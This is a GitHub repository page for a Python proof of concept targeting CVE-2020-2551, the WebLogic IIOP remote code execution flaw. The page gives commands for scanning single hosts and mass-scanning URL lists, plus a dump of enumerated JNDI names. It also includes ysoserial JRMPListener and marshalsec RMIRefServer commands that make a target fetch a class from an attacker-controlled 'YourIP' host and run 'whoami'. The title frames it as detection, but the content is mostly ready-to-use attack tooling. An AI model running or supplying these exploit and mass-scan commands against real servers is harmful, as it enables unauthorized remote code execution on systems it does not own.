Skip to content

how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP

Notifications You must be signed in to change notification settings

hktalent/CVE-2020-2551

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 

Repository files navigation

Twitter: @Hktalent3135773 Tweet Follow on Twitter

0、how get pro exploit tools?

see #5

1、CVE-2020-2551

CVE-2020-2551 poc exploit python example keys: GIOP corba image

How use

python3 CVE-2020-2551.py -u http://192.168.26.79:7001
cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# 32 Thread check
cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
# now result to data/*.txt
java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port

t3, t3s, http, https, iiop, iiops

service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime

poc

image

2、your know your do

{
    "ejb": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "interfaces": [
            "javax.naming.Context"
        ],
        "mgmt": {
            "MEJB": {
                "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
                "interfaces": []
            },
            "class": "com.sun.jndi.cosnaming.CNCtx",
            "interfaces": [
                "javax.naming.Context"
            ]
        }
    },
    "javax": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "jdbc": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "db_xf": {
            "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
            "interfaces": []
        },
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "mejbmejb_jarMejb_EO": {
        "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
        "interfaces": []
    },
    "weblogic": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    }
}

3、ejb

/bea_wls_internal/classes/mejb@/

weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)

4、jta

x.lookup("ejb/mgmt/MEJB").remove(jta);

5、logs

  • fix rmi use Jdk7u21 payload,not work for remote jdk8 don‘t use
java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'

use,XXclass.class from jdk6 build

java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099

6、thanks for

@r4v3zn @0nise Top Langs

About

how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP

Resources

Stars

Watchers

Forks

Sponsor this project

Packages

No packages published

Languages